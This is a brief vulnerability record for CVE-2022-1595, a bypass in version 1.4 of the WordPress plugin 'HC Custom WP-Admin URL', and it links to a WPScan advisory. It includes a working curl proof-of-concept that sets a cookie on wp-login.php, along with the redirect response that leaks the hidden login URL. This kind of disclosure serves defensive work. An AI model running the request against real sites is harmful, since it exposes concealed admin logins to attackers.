CVE: CVE-2022-1595 Name: HC Custom WP-Admin URL (hc-custom-wp-admin-url) Version: 1.4 Date: 2022-04-13 20:38:07 Advisory: https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b Type: Bypass Exploit: Leaks / redirects to the configured secret URL when the valid_login_slug=1 cookie is set. curl -sIXGET -H "Cookie: valid_login_slug=1" https://example.com/wp-login.php HTTP/2 302 ... x-redirect-by: WordPress location: secret ...